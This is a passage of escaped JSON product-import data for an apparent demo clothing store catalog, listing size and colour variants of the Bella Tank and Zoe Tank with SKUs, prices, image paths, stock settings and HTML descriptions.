Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-L-Black\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bella-tank-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1632\":{\"sku\":\"WT01-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-L-Blue\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bella-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt01-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1633\":{\"sku\":\"WT01-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-L-Orange\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bella-tank-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1634\":{\"sku\":\"WT01-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-XL-Black\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bella-tank-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1635\":{\"sku\":\"WT01-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-XL-Blue\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bella-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt01-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1636\":{\"sku\":\"WT01-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-XL-Orange\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bella-tank-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1637\":{\"sku\":\"WT01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Organic Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT01-XS-Black,size=XS,color=Black|sku=WT01-XS-Blue,size=XS,color=Blue|sku=WT01-XS-Orange,size=XS,color=Orange|sku=WT01-S-Black,size=S,color=Black|sku=WT01-S-Blue,size=S,color=Blue|sku=WT01-S-Orange,size=S,color=Orange|sku=WT01-M-Black,size=M,color=Black|sku=WT01-M-Blue,size=M,color=Blue|sku=WT01-M-Orange,size=M,color=Orange|sku=WT01-L-Black,size=L,color=Black|sku=WT01-L-Blue,size=L,color=Blue|sku=WT01-L-Orange,size=L,color=Orange|sku=WT01-XL-Black,size=XL,color=Black|sku=WT01-XL-Blue,size=XL,color=Blue|sku=WT01-XL-Orange,size=XL,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt01-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1638\":{\"sku\":\"WT02-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-XS-Green\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1639\":{\"sku\":\"WT02-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-XS-Orange\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\